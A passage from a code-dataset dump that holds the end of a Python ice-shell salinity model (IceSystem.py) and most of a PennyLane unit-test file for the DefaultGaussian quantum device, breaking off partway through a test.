2019\n\t\t\ts_depth = lambda z, a, b, c: a + b / (c - z)\n\t\t\tself.S = s_depth(self.Z, *self.depth_consts[composition][concentration])\n\n\t\t\tif in_situ is False: # for water emplaced in a salty shell\n\t\t\t\tself.S[self.geom] = concentration\n\t\t\telse: # must redistribute the salt evenly to simulate real in-situ melting\n\t\t\t\tprint('Redistributing salt in intrusion')\n\t\t\t\ttry:\n\t\t\t\t\tS_int_tot = self.S[self.geom].sum()\n\t\t\t\t\tself.S[self.geom] = S_int_tot / np.shape(self.geom)[1]\n\t\t\t\t\tif self.S[self.geom].sum() / S_int_tot > 1.0 + 1e-15 or \\\n\t\t\t\t\t\t\tself.S[self.geom].sum() / S_int_tot < 1.0 - 1e-15:\n\t\t\t\t\t\tprint('S_int_new/Si =', self.S[self.geom].sum() / S_int_tot)\n\t\t\t\t\t\traise Exception('problem with salt redistribution')\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tpass\n\t\t\t\tprint('-- New intrusion salinity: {} ppt'.format(self.S[self.geom[0][0], self.geom[1][0]]))\n\n\t\t\t# update temperature profile to reflect bottom boundary condition\n\t\t\tif T_match:\n\t\t\t\tself.Tbot = self.Tm_func(s_depth(self.Lz, *self.depth_consts[composition][concentration]),\n\t\t\t\t *self.Tm_consts[composition])\n\t\t\t\tprint('-- Adjusting temperature profile: Tsurf = {}, Tbot = {}'.format(self.Tsurf, self.Tbot))\n\t\t\t\tself.init_T(Tsurf=self.Tsurf, Tbot=self.Tbot)\n\t\t\telse:\n\t\t\t\tpass\n\n\t\telse:\n\t\t\t# homogeneous brine, pure ice shell\n\t\t\tself.S = self.phi * concentration\n\n\t\t\tif T_match:\n\t\t\t\tself.Tbot = self.Tm_func(concentration, *self.Tm_consts[composition])\n\t\t\t\tprint('--Pure shell; adjusting temperature profile: Tsurf = {}, Tbot = {}'.format(self.Tsurf,\n\t\t\t\t self.Tbot))\n\t\t\t\tself.init_T(Tsurf=self.Tsurf, Tbot=self.Tbot)\n\t\t\telse:\n\t\t\t\tpass\n\n\t\t# update initial melting temperature\n\t\tself.Tm = self.Tm_func(self.S, *self.Tm_consts[composition])\n\t\t# update volume average with included salt\n\t\tself.init_volume_averages()\n\t\t# begin tracking mass\n\t\tself.total_salt = [self.S.sum()]\n\t\t# begin tracking amount of salt removed from system\n\t\tself.removed_salt, self.mass_removed, self.ppt_removed = [0], [0], [0]\n\t\tself.wat_vol = [self.geom[1].shape[0]]\n\n\t\t# update temperature of liquid to reflect salinity\n\t\ttry:\n\t\t\tself.T_int = self.Tm_func(self.S[self.geom], *self.Tm_consts[composition])[0]\n\t\t\tprint('--Updating intrusion temperature to reflect initial salinity, Tint =', self.T_int)\n\t\t\tself.T[self.geom] = self.T_int\n\t\texcept AttributeError:\n\t\t\tpass\n\t\tself.save_initials()\n\n\tdef entrain_salt(self, dT, S, composition):\n\t\t\"\"\"\n\t\tCalculate the amount of salt entrained in newly frozen ice that is dependent on the thermal gradient across\n\t\tthe ice (Buffo et al., in review).\n\t\tParameters:\n\t\t\tdT : float, array\n\t\t\t\ttemperature gradient across cell, or array of temperature gradients\n\t\t\tS : float, array\n\t\t\t\tsalinity (ppt) of newly frozen cell, or array of salinities\n\t\t\tcomposition : string\n\t\t\t\tsalt composition\n\t\t\t\toptions: 'MgSO4', 'NaCl'\n\t\tReturns:\n\t\t\tamount of salt entrained in ice, ppt\n\t\t\tor array of salt entrained in ice, ppt\n\n\t\tUsage:\n\t\t\tSee HeatSolver.update_salinity() function.\n\t\t\"\"\"\n\t\tif isinstance(dT, (int, float)): # if dT (and therefore S) is a single value\n\t\t\tif S in self.shallow_consts[composition]:\n\t\t\t\t# determine whether to use linear or shallow fit\n\t\t\t\tswitch_dT = self.linear_shallow_roots[composition][S]\n\t\t\t\tif dT > switch_dT:\n\t\t\t\t\treturn 
self.shallow_fit(dT, *self.shallow_consts[composition][S])\n\t\t\t\telif dT <= switch_dT:\n\t\t\t\t\treturn self.linear_fit(dT, *self.linear_consts[composition][S])\n\n\t\t\telse: # salinity not in SlushFund runs\n\t\t\t\t# find which two known concentrations current S fits between\n\t\t\t\tc_min = self.concentrations[S > self.concentrations].max()\n\t\t\t\tc_max = self.concentrations[S < self.concentrations].min()\n\n\t\t\t\t# linearly interpolate between the two concentrations at gradient dT\n\t\t\t\tm, b = np.polyfit([c_max, c_min], [self.entrain_salt(dT, c_max, composition),\n\t\t\t\t self.entrain_salt(dT, c_min, composition)], 1)\n\n\t\t\t\t# return concentration of entrained salt\n\t\t\t\treturn m * S + b\n\n\t\telse: # recursively call this function to fill an array of the same length as input array\n\t\t\treturn np.array([self.entrain_salt(t, s, composition) for t, s in zip(dT, S)], dtype=float)\n","sub_path":"IceSystem.py","file_name":"IceSystem.py","file_ext":"py","file_size_in_byte":23296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"607057984","text":"# Copyright 2018 Xanadu Quantum Technologies Inc.\r\n\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\"\"\"\r\nUnit tests for the :mod:`pennylane.plugin.DefaultGaussian` device.\r\n\"\"\"\r\n# pylint: disable=protected-access,cell-var-from-loop\r\nimport unittest\r\nimport inspect\r\nimport logging as log\r\n\r\nfrom scipy.special import factorial as fac\r\nfrom scipy.linalg import block_diag\r\n\r\nfrom defaults import pennylane as qml, BaseTest\r\n\r\nfrom pennylane import numpy as np\r\n\r\nfrom pennylane.plugins.default_gaussian import fock_prob\r\n\r\nfrom pennylane.plugins.default_gaussian import (rotation, squeezing, quadratic_phase,\r\n beamsplitter, two_mode_squeezing,\r\n controlled_addition, controlled_phase)\r\nfrom pennylane.plugins.default_gaussian import (vacuum_state, coherent_state,\r\n squeezed_state, displaced_squeezed_state,\r\n thermal_state)\r\n\r\nfrom pennylane.plugins.default_gaussian import DefaultGaussian\r\n\r\n\r\nlog.getLogger('defaults')\r\n\r\n\r\nU = np.array([[0.83645892-0.40533293j, -0.20215326+0.30850569j],\r\n [-0.23889780-0.28101519j, -0.88031770-0.29832709j]])\r\n\r\n\r\nU2 = np.array([[-0.07843244-3.57825948e-01j, 0.71447295-5.38069384e-02j, 0.20949966+6.59100734e-05j, -0.50297381+2.35731613e-01j],\r\n [-0.26626692+4.53837083e-01j, 0.27771991-2.40717436e-01j, 0.41228017-1.30198687e-01j, 0.01384490-6.33200028e-01j],\r\n [-0.69254712-2.56963068e-02j, -0.15484858+6.57298384e-02j, -0.53082141+7.18073414e-02j, -0.41060450-1.89462315e-01j],\r\n [-0.09686189-3.15085273e-01j, -0.53241387-1.99491763e-01j, 0.56928622+3.97704398e-01j, -0.28671074-6.01574497e-02j]])\r\n\r\n\r\nH = np.array([[1.02789352, 1.61296440-0.3498192j],\r\n [1.61296440+0.3498192j, 1.23920938+0j]])\r\n\r\n\r\nhbar = 2\r\n\r\ndef prep_par(par, op):\r\n \"Convert par into a list of parameters that op expects.\"\r\n if op.par_domain == 'A':\r\n return 
[np.diag([x, 1]) for x in par]\r\n return par\r\n\r\n\r\nclass TestAuxillaryFunctions(BaseTest):\r\n \"\"\"Tests the auxiliary functions\"\"\"\r\n\r\n def setUp(self):\r\n self.hbar = 2.\r\n\r\n # an arbitrary two-mode Gaussian state generated using Strawberry Fields\r\n self.mu = np.array([0.6862, 0.4002, 0.09, 0.558])*np.sqrt(self.hbar)\r\n self.cov = np.array([[0.50750512, -0.04125979, -0.21058229, -0.07866912],\r\n [-0.04125979, 0.50750512, -0.07866912, -0.21058229],\r\n [-0.21058229, -0.07866912, 0.95906208, 0.27133391],\r\n [-0.07866912, -0.21058229, 0.27133391, 0.95906208]])*self.hbar\r\n\r\n # expected Fock state probabilities\r\n self.events = [(0, 0), (0, 1), (1, 1), (2, 3)]\r\n self.probs = [0.430461524043, 0.163699407559, 0.0582788388927, 0.00167706931355]\r\n\r\n def test_fock_prob(self):\r\n \"\"\"Test fock_prob returns the correct Fock probabilities\"\"\"\r\n for idx, e in enumerate(self.events):\r\n res = fock_prob(self.mu, self.cov, e, hbar=self.hbar)\r\n self.assertAlmostEqual(res, self.probs[idx], delta=self.tol)\r\n\r\n\r\nclass TestGates(BaseTest):\r\n \"\"\"Gate tests.\"\"\"\r\n\r\n def test_rotation(self):\r\n \"\"\"Test the Fourier transform of a displaced state.\"\"\"\r\n # pylint: disable=invalid-unary-operand-type\r\n self.logTestName()\r\n\r\n alpha = 0.23+0.12j\r\n S = rotation(np.pi/2)\r\n\r\n # apply to a coherent state. F{x, p} -> {-p, x}\r\n out = S @ np.array([alpha.real, alpha.imag])*np.sqrt(2*hbar)\r\n expected = np.array([-alpha.imag, alpha.real])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_squeezing(self):\r\n \"\"\"Test the squeezing symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n r = 0.543\r\n phi = 0.123\r\n S = squeezing(r, phi)\r\n\r\n # apply to an identity covariance matrix\r\n out = S @ S.T\r\n expected = rotation(phi/2) @ np.diag(np.exp([-2*r, 2*r])) @ rotation(phi/2).T\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_quadratic_phase(self):\r\n \"\"\"Test the quadratic phase symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n s = 0.543\r\n S = quadratic_phase(s)\r\n\r\n # apply to a coherent state. P[x, p] -> [x, p+sx]\r\n alpha = 0.23+0.12j\r\n out = S @ np.array([alpha.real, alpha.imag])*np.sqrt(2*hbar)\r\n expected = np.array([alpha.real, alpha.imag+s*alpha.real])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_beamsplitter(self):\r\n \"\"\"Test the beamsplitter symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n theta = 0.543\r\n phi = 0.312\r\n S = beamsplitter(theta, phi)\r\n\r\n # apply to a coherent state.
BS|a1, a2> -> |ta1-r^*a2, ra1+ta2>\r\n a1 = 0.23+0.12j\r\n a2 = 0.23+0.12j\r\n out = S @ np.array([a1.real, a2.real, a1.imag, a2.imag])*np.sqrt(2*hbar)\r\n\r\n T = np.cos(theta)\r\n R = np.exp(1j*phi)*np.sin(theta)\r\n a1out = T*a1 - R.conj()*a2\r\n a2out = R*a1 + T*a2\r\n expected = np.array([a1out.real, a2out.real, a1out.imag, a2out.imag])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_two_mode_squeezing(self):\r\n \"\"\"Test the two mode squeezing symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n r = 0.543\r\n phi = 0.123\r\n S = two_mode_squeezing(r, phi)\r\n\r\n # test that S = B^\\dagger(pi/4, 0) [S(z) x S(-z)] B(pi/4)\r\n B = beamsplitter(np.pi/4, 0)\r\n Sz = block_diag(squeezing(r, phi), squeezing(-r, phi))[:, [0, 2, 1, 3]][[0, 2, 1, 3]]\r\n expected = B.conj().T @ Sz @ B\r\n self.assertAllAlmostEqual(S, expected, delta=self.tol)\r\n\r\n # test that S |a1, a2> = |ta1+ra2, ta2+ra1>\r\n a1 = 0.23+0.12j\r\n a2 = 0.23+0.12j\r\n out = S @ np.array([a1.real, a2.real, a1.imag, a2.imag])*np.sqrt(2*hbar)\r\n\r\n T = np.cosh(r)\r\n R = np.exp(1j*phi)*np.sinh(r)\r\n a1out = T*a1 + R*np.conj(a2)\r\n a2out = T*a2 + R*np.conj(a1)\r\n expected = np.array([a1out.real, a2out.real, a1out.imag, a2out.imag])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_controlled_addition(self):\r\n \"\"\"Test the CX symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n s = 0.543\r\n S = controlled_addition(s)\r\n\r\n # test that S = B(theta+pi/2, 0) [S(z) x S(-z)] B(theta, 0)\r\n r = np.arcsinh(-s/2)\r\n theta = 0.5*np.arctan2(-1/np.cosh(r), -np.tanh(r))\r\n Sz = block_diag(squeezing(r, 0), squeezing(-r, 0))[:, [0, 2, 1, 3]][[0, 2, 1, 3]]\r\n\r\n expected = beamsplitter(theta+np.pi/2, 0) @ Sz @ beamsplitter(theta, 0)\r\n self.assertAllAlmostEqual(S, expected, delta=self.tol)\r\n\r\n # test that S[x1, x2, p1, p2] -> [x1, x2+sx1, p1-sp2, p2]\r\n x1 = 0.5432\r\n x2 = -0.453\r\n p1 = 0.154\r\n p2 = -0.123\r\n out = S @ np.array([x1, x2, p1, p2])*np.sqrt(2*hbar)\r\n expected = np.array([x1, x2+s*x1, p1-s*p2, p2])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n def test_controlled_phase(self):\r\n \"\"\"Test the CZ symplectic transform.\"\"\"\r\n self.logTestName()\r\n\r\n s = 0.543\r\n S = controlled_phase(s)\r\n\r\n # test that S = R_2(pi/2) CX(s) R_2(pi/2)^\\dagger\r\n R2 = block_diag(np.identity(2), rotation(np.pi/2))[:, [0, 2, 1, 3]][[0, 2, 1, 3]]\r\n expected = R2 @ controlled_addition(s) @ R2.conj().T\r\n self.assertAllAlmostEqual(S, expected, delta=self.tol)\r\n\r\n # test that S[x1, x2, p1, p2] -> [x1, x2, p1+sx2, p2+sx1]\r\n x1 = 0.5432\r\n x2 = -0.453\r\n p1 = 0.154\r\n p2 = -0.123\r\n out = S @ np.array([x1, x2, p1, p2])*np.sqrt(2*hbar)\r\n expected = np.array([x1, x2, p1+s*x2, p2+s*x1])*np.sqrt(2*hbar)\r\n self.assertAllAlmostEqual(out, expected, delta=self.tol)\r\n\r\n\r\nclass TestStates(BaseTest):\r\n \"\"\"State tests.\"\"\"\r\n\r\n def test_vacuum_state(self):\r\n \"\"\"Test the vacuum state is correct.\"\"\"\r\n self.logTestName()\r\n wires = 3\r\n means, cov = vacuum_state(wires, hbar=hbar)\r\n self.assertAllAlmostEqual(means, np.zeros([2*wires]), delta=self.tol)\r\n self.assertAllAlmostEqual(cov, np.identity(2*wires)*hbar/2, delta=self.tol)\r\n\r\n def test_coherent_state(self):\r\n \"\"\"Test the coherent state is correct.\"\"\"\r\n self.logTestName()\r\n a = 0.432-0.123j\r\n means, cov = coherent_state(a, hbar=hbar)\r\n self.assertAllAlmostEqual(means,
np.array([a.real, a.imag])*np.sqrt(2*hbar), delta=self.tol)\r\n self.assertAllAlmostEqual(cov, np.identity(2)*hbar/2, delta=self.tol)\r\n\r\n def test_squeezed_state(self):\r\n \"\"\"Test the squeezed state is correct.\"\"\"\r\n self.logTestName()\r\n r = 0.432\r\n phi = 0.123\r\n means, cov = squeezed_state(r, phi, hbar=hbar)\r\n\r\n # test vector of means is zero\r\n self.assertAllAlmostEqual(means, np.zeros([2]), delta=self.tol)\r\n\r\n R = rotation(phi/2)\r\n expected = R @ np.array([[np.exp(-2*r), 0],\r\n [0, np.exp(2*r)]]) * hbar/2 @ R.T\r\n # test covariance matrix is correct\r\n self.assertAllAlmostEqual(cov, expected, delta=self.tol)\r\n\r\n def test_displaced_squeezed_state(self):\r\n \"\"\"Test the displaced squeezed state is correct.\"\"\"\r\n self.logTestName()\r\n alpha = 0.541+0.109j\r\n a = abs(alpha)\r\n phi_a = np.angle(alpha)\r\n r = 0.432\r\n phi_r = 0.123\r\n means, cov = displaced_squeezed_state(a, phi_a, r, phi_r, hbar=hbar)\r\n\r\n # test vector of means is correct\r\n self.assertAllAlmostEqual(means, np.array([alpha.real, alpha.imag])*np.sqrt(2*hbar), delta=self.tol)\r\n\r\n R = rotation(phi_r/2)\r\n expected = R @ np.array([[np.exp(-2*r), 0],\r\n [0, np.exp(2*r)]]) * hbar/2 @ R.T\r\n # test covariance matrix is correct\r\n self.assertAllAlmostEqual(cov, expected, delta=self.tol)\r\n\r\n def test_thermal_state(self):\r\n \"\"\"Test the thermal state is correct.\"\"\"\r\n self.logTestName()\r\n nbar = 0.5342\r\n means, cov = thermal_state(nbar, hbar=hbar)\r\n self.assertAllAlmostEqual(means, np.zeros([2]), delta=self.tol)\r\n # a thermal state has both quadrature variances equal to (2*nbar+1)*hbar/2\r\n self.assertAllAlmostEqual(np.diag(cov), (2*nbar+1)*hbar/2*np.ones(2), delta=self.tol)\r\n\r\n\r\n\r\nclass TestDefaultGaussianDevice(BaseTest):\r\n \"\"\"Test the default gaussian device. The test ensures that the device is properly\r\n applying gaussian operations and calculating the correct observables.\"\"\"\r\n def setUp(self):\r\n self.dev = DefaultGaussian(wires=2, shots=0, hbar=hbar)\r\n\r\n def test_operation_map(self):\r\n \"\"\"Test that default Gaussian device supports all PennyLane Gaussian CV gates.\"\"\"\r\n self.logTestName()\r\n\r\n non_supported = {'FockDensityMatrix',\r\n 'FockStateVector',\r\n 'FockState',\r\n 'CrossKerr',\r\n 'CatState',\r\n 'CubicPhase',\r\n 'Kerr'}\r\n\r\n self.assertEqual(set(qml.ops.cv.__all__) - non_supported,\r\n set(self.dev._operation_map))\r\n\r\n def test_expectation_map(self):\r\n \"\"\"Test that default Gaussian device supports all PennyLane Gaussian continuous expectations.\"\"\"\r\n self.logTestName()\r\n self.assertEqual(set(qml.expval.cv.__all__)|{'Identity'}-{'Heterodyne'},\r\n set(self.dev._expectation_map))\r\n\r\n def test_apply(self):\r\n \"\"\"Test the application of gates to a state\"\"\"\r\n self.logTestName()\r\n\r\n # loop through all supported operations\r\n for gate_name, fn in self.dev._operation_map.items():\r\n log.debug(\"\\tTesting %s gate...\", gate_name)\r\n self.dev.reset()\r\n\r\n # start in the displaced squeezed state\r\n alpha = 0.542+0.123j\r\n a = abs(alpha)\r\n phi_a = np.angle(alpha)\r\n r = 0.652\r\n phi_r = -0.124\r\n\r\n self.dev.apply('DisplacedSqueezedState', wires=[0], par=[a, phi_a, r, phi_r])\r\n self.dev.apply('DisplacedSqueezedState', wires=[1], par=[a, phi_a, r, phi_r])\r\n\r\n # get the equivalent pennylane operation class\r\n op = qml.ops.__getattribute__(gate_name)\r\n # the list of wires to apply the operation to\r\n w = list(range(op.num_wires))\r\n\r\n if op.par_domain == 'A':\r\n # the parameter is an array\r\n if gate_name == 'GaussianState':\r\n p = [np.array([0.432, 0.123, 0.342,
0.123]), np.diag([0.5234]*4)]\r\n w = list(range(2))\r\n expected_out = p\r\n elif gate_name == 'Interferometer':\r\n w = list(range(2))\r\n p = [U]\r\n S = fn(*p)\r\n expected_out = S @ self.dev._state[0], S @ self.dev._state[1] @ S.T\r\n else:\r\n # the parameter is a float\r\n p = [0.432423, -0.12312, 0.324, 0.751][:op.num_params]\r\n\r\n if gate_name == 'Displacement':\r\n alpha = p[0]*np.exp(1j*p[1])\r\n state = self.dev._state\r\n mu = state[0].copy()\r\n mu[w[0]] += alpha.real*np.sqrt(2*hbar)\r\n mu[w[0]+2] += alpha.imag*np.sqrt(2*hbar)\r\n expected_out = mu, state[1]\r\n elif 'State' in gate_name:\r\n mu, cov = fn(*p, hbar=hbar)\r\n expected_out = self.dev._state\r\n expected_out[0][[w[0], w[0]+2]] = mu\r\n\r\n ind = np.concatenate([np.array([w[0]]), np.array([w[0]])+2])\r\n rows = ind.reshape(-1, 1)\r\n cols = ind.reshape(1, -1)\r\n expected_out[1][rows, cols] = cov\r\n else:\r\n # if the default.gaussian is an operation accepting parameters,\r\n # initialise it using the parameters generated above.\r\n S = fn(*p)\r\n\r\n # calculate the expected output\r\n if op.num_wires == 1:\r\n # reorder from symmetric ordering to xp-ordering\r\n S = block_diag(S, np.identity(2))[:, [0, 2, 1, 3]][[0, 2, 1, 3]]\r\n\r\n expected_out = S @ self.dev._state[0], S @ self.dev._state[1] @ S.T\r\n\r\n self.dev.apply(gate_name, wires=w, par=p)\r\n\r\n # verify the device is now in the expected state\r\n self.assertAllAlmostEqual(self.dev._state[0], expected_out[0], delta=self.tol)\r\n self.assertAllAlmostEqual(self.dev._state[1], expected_out[1], delta=self.tol)\r\n\r\n def test_apply_errors(self):\r\n \"\"\"Test that apply fails for incorrect state preparation\"\"\"\r\n self.logTestName()\r\n\r\n with self.assertRaisesRegex(ValueError, 'incorrect size for the number of subsystems'):\r\n p = [thermal_state(0.5)]\r\n self.dev.apply('GaussianState', wires=[0], par=[p])\r\n\r\n with self.assertRaisesRegex(ValueError, 'Incorrect number of subsystems'):\r\n p = U\r\n self.dev.apply('Interferometer', wires=[0], par=[p])\r\n\r\n with self.assertRaisesRegex(ValueError, \"Invalid target subsystems provided in 'wires' argument\"):\r\n p = U2\r\n dev = DefaultGaussian(wires=4, shots=0, hbar=hbar)\r\n self.dev.apply('Interferometer', wires=[0, 1, 2], par=[p])\r\n\r\n def test_expectation(self):\r\n \"\"\"Test that expectation values are calculated correctly\"\"\"\r\n self.logTestName()\r\n\r\n dev = qml.device('default.gaussian', wires=1, hbar=hbar)\r\n\r\n # test correct mean and variance of a displaced thermal state\r\n nbar = 0.5431\r\n alpha = 0.324-0.59j\r\n dev.apply('ThermalState', wires=[0], par=[nbar])\r\n dev.apply('Displacement', wires=[0], par=[alpha, 0])\r\n mean = dev.expval('MeanPhoton', [0], [])\r\n self.assertAlmostEqual(mean, np.abs(alpha)**2+nbar, delta=self.tol)\r\n # self.assertAlmostEqual(var, nbar**2+nbar+np.abs(alpha)**2*(1+2*nbar), delta=self.tol)\r\n\r\n # test correct mean and variance for Homodyne P measurement\r\n alpha = 0.324-0.59j\r\n dev.apply('CoherentState', wires=[0], par=[alpha])\r\n mean = dev.expval('P', [0], [])\r\n self.assertAlmostEqual(mean, alpha.imag*np.sqrt(2*hbar), delta=self.tol)\r\n # self.assertAlmostEqual(var, hbar/2, delta=self.tol)\r\n\r\n # test correct mean and variance for Homodyne measurement\r\n mean = dev.expval('Homodyne', [0], [np.pi/2])\r\n self.assertAlmostEqual(mean, alpha.imag*np.sqrt(2*hbar), delta=self.tol)\r\n # self.assertAlmostEqual(var, hbar/2, delta=self.tol)\r\n\r\n # test correct mean and variance for number state expectation |<n|alpha>|^2\r\n #
on a coherent state\r\n for n in range(3):\r\n mean = dev.expval('NumberState', [0], [np.array([n])])\r\n expected = np.abs(np.exp(-np.abs(alpha)**2/2)*alpha**n/np.sqrt(fac(n)))**2\r\n self.assertAlmostEqual(mean, expected, delta=self.tol)\r\n\r\n # test correct mean and variance for number state expectation ||^2\r\n # on a squeezed state\r\n n = 1\r\n r = 0.4523\r\n dev.apply('SqueezedState', wires=[0], par=[r, 0])\r\n mean = dev.expval('NumberState', [0], [np.array([2*n])])\r\n expected = np.abs(np.sqrt(fac(2*n))/(2**n*fac(n))*(-np.tanh(r))**n/np.sqrt(np.cosh(r)))**2\r\n self.assertAlmostEqual(mean, expected, delta=self.tol)\r\n\r\n def test_reduced_state(self):\r\n \"\"\"Test reduced state\"\"\"\r\n self.logTestName()\r\n\r\n # Test error is raised if requesting a non-existant subsystem\r\n with self.assertRaisesRegex(ValueError, \"specified wires cannot be larger than the number of subsystems\"):\r\n self.dev.reduced_state([6, 4])\r\n\r\n # Test requesting via an integer\r\n res = self.dev.reduced_state(0)\r\n expected = self.dev.reduced_state([0])\r\n self.assertAllAlmostEqual(res[0], expected[0], delta=self.tol)\r\n self.assertAllAlmostEqual(res[1], expected[1], delta=self.tol)\r\n\r\n # Test requesting all wires returns the full state\r\n res = self.dev.reduced_state([0, 1])\r\n expected = self.dev._state\r\n self.assertAllAlmostEqual(res[0], expected[0], delta=self.tol)\r\n self.assertAllAlmostEqual(res[1], expected[1], delta=self.tol)\r\n\r\n\r\nclass TestDefaultGaussianIntegration(BaseTest):\r\n \"\"\"Integration tests for default.gaussian. This test ensures it integrates\r\n properly with the PennyLane interface, in particular QNode.\"\"\"\r\n\r\n def test_load_default_gaussian_device(self):\r\n \"\"\"Test that the default plugin loads correctly\"\"\"\r\n self.logTestName()\r\n\r\n dev = qml.device('default.gaussian', wires=2, hbar=2)\r\n self.assertEqual(dev.num_wires, 2)\r\n self.assertEqual(dev.shots, 0)\r\n self.assertEqual(dev.hbar, 2)\r\n self.assertEqual(dev.short_name, 'default.gaussian')\r\n\r\n def test_args(self):\r\n \"\"\"Test that the plugin requires correct arguments\"\"\"\r\n self.logTestName()\r\n\r\n with self.assertRaisesRegex(TypeError, \"missing 1 required positional argument: 'wires'\"):\r\n qml.device('default.gaussian')\r\n\r\n def test_unsupported_gates(self):\r\n \"\"\"Test error is raised with unsupported gates\"\"\"\r\n self.logTestName()\r\n dev = qml.device('default.gaussian', wires=2)\r\n\r\n gates = set(dev._operation_map.keys())\r\n all_gates = {m[0] for m in inspect.getmembers(qml.ops, inspect.isclass)}\r\n\r\n for g in all_gates - gates:\r\n op = getattr(qml.ops, g)\r\n\r\n if op.num_wires == 0:\r\n wires = [0]\r\n else:\r\n wires = list(range(op.num_wires))\r\n\r\n @qml.qnode(dev)\r\n def circuit(*x):\r\n \"\"\"Test quantum function\"\"\"\r\n x = prep_par(x, op)\r\n op(*x, wires=wires)\r\n\r\n if issubclass(op, qml.operation.CV):\r\n return qml.expval.X(0)\r\n\r\n return qml.expval.PauliZ(0)\r\n\r\n with self.assertRaisesRegex(qml.DeviceError, \"Gate {} not supported on device default.gaussian\".format(g)):\r\n x = np.random.random([op.num_params])\r\n circuit(*x)\r\n\r\n def test_unsupported_observables(self):\r\n \"\"\"Test error is raised with unsupported observables\"\"\"\r\n self.logTestName()\r\n dev = qml.device('default.gaussian', wires=2)\r\n\r\n obs = set(dev._expectation_map.keys())\r\n all_obs = set(qml.expval.__all__)\r\n\r\n for g in all_obs - obs:\r\n op = getattr(qml.expval, g)\r\n\r\n if op.num_wires == 0:\r\n wires = [0]\r\n 
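# The unsupported-gate and unsupported-observable tests around this point
# share one pattern: set-difference the framework's full export list against
# the device's map, then assert each leftover raises. A dependency-free
# sketch of that pattern (the registry and exception below are toy stand-ins,
# not the real qml namespaces):
device_map = {'Displacement': None, 'Squeezing': None}
all_exports = {'Displacement', 'Squeezing', 'CNOT', 'Toffoli'}

for name in sorted(all_exports - set(device_map)):
    try:
        raise NotImplementedError(
            "Gate {} not supported on device default.gaussian".format(name))
    except NotImplementedError as exc:
        assert name in str(exc)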
else:\r\n wires = list(range(op.num_wires))\r\n\r\n @qml.qnode(dev)\r\n def circuit(*x):\r\n \"\"\"Test quantum function\"\"\"\r\n x = prep_par(x, op)\r\n return op(*x, wires=wires)\r\n\r\n with self.assertRaisesRegex(qml.DeviceError, \"Expectation {} not supported on device default.gaussian\".format(g)):\r\n x = np.random.random([op.num_params])\r\n circuit(*x)\r\n\r\n def test_gaussian_circuit(self):\r\n \"\"\"Test that the default gaussian plugin provides correct result for simple circuit\"\"\"\r\n self.logTestName()\r\n dev = qml.device('default.gaussian', wires=1)\r\n\r\n p = 0.543\r\n\r\n @qml.qnode(dev)\r\n def circuit(x):\r\n \"\"\"Test quantum function\"\"\"\r\n qml.Displacement(x, 0, wires=0)\r\n return qml.expval.X(0)\r\n\r\n self.assertAlmostEqual(circuit(p), p*np.sqrt(2*hbar), delta=self.tol)\r\n\r\n def test_gaussian_identity(self):\r\n \"\"\"Test that the default gaussian plugin provides correct result for the identity expectation\"\"\"\r\n self.logTestName()\r\n dev = qml.device('default.gaussian', wires=1)\r\n\r\n p = 0.543\r\n\r\n @qml.qnode(dev)\r\n def circuit(x):\r\n \"\"\"Test quantum function\"\"\"\r\n qml.Displacement(x, 0, wires=0)\r\n return qml.expval.Identity(0)\r\n\r\n self.assertAlmostEqual(circuit(p), 1, delta=self.tol)\r\n\r\n def test_nonzero_shots(self):\r\n \"\"\"Test that the default gaussian plugin provides correct result for high shot number\"\"\"\r\n self.logTestName()\r\n\r\n shots = 10**4\r\n dev = qml.device('default.gaussian', wires=1, shots=shots)\r\n\r\n p = 0.543\r\n\r\n @qml.qnode(dev)\r\n def circuit(x):\r\n \"\"\"Test quantum function\"\"\"\r\n qml.Displacement(x, 0, wires=0)\r\n return qml.expval.X(0)\r\n\r\n runs = []\r\n for _ in range(100):\r\n runs.append(circuit(p))\r\n\r\n self.assertAlmostEqual(np.mean(runs), p*np.sqrt(2*hbar), delta=0.01)\r\n\r\n def test_supported_gates(self):\r\n \"\"\"Test that all supported gates work correctly\"\"\"\r\n self.logTestName()\r\n a = 0.312\r\n\r\n dev = qml.device('default.gaussian', wires=2)\r\n\r\n for g, qop in dev._operation_map.items():\r\n log.debug('\\tTesting gate %s...', g)\r\n self.assertTrue(dev.supported(g))\r\n dev.reset()\r\n\r\n op = getattr(qml.ops, g)\r\n if op.num_wires == 0:\r\n wires = list(range(2))\r\n else:\r\n wires = list(range(op.num_wires))\r\n\r\n @qml.qnode(dev)\r\n def circuit(*x):\r\n \"\"\"Reference quantum function\"\"\"\r\n qml.Displacement(a, 0, wires=[0])\r\n op(*x, wires=wires)\r\n return qml.expval.X(0)\r\n\r\n # compare to reference result\r\n def reference(*x):\r\n \"\"\"reference circuit\"\"\"\r\n if g == 'GaussianState':\r\n return x[0][0]\r\n\r\n if g == 'Displacement':\r\n alpha = x[0]*np.exp(1j*x[1])\r\n return (alpha+a).real*np.sqrt(2*hbar)\r\n\r\n if 'State' in g:\r\n mu, _ = qop(*x, hbar=hbar)\r\n return mu[0]\r\n\r\n S = qop(*x)\r\n\r\n # calculate the expected output\r\n if op.num_wires == 1:\r\n S = block_diag(S, np.identity(2))[:, [0, 2, 1, 